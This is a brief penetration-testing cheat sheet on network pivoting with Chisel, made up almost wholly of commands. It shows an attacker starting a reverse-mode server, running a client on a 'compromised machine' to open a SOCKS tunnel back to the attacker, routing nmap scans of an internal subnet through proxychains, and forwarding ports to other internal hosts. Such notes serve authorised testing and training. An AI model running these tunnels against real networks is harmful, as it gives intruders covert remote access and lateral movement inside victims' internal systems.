Pivoting

Chisel

Start a server on attacker machine listening for a connection on port 1234. Default is 8080 if -p is not specified. --reverse allows connections from client through a reverse tunnel where the victim (client) can open a port on the attacker machine (server).

./chisel server -p 1234 --reverse

Transfer chisel to compromised machine and run chisel as client where we create a reverse proxy and open port 1080 (socks) on the attacker machine.

./chisel client server_IP:1234 R:socks

In the /etc/proxychains.conf file, append:

socks5 127.0.0.1 1080

You can now run commands from the attacker machine using proxychains.

proxychains4 nmap 10.14.1.0/24

To access another machine from the client's internal network. It opens a listener on server on port 80 and that will be forwarded to client and then the other machine in the client's machine.

//Attacker
./chisel server -p 8000 --reverse

//Victim
./chisel client [server_IP]:8000 R:80:[client_side_internal_ip]:80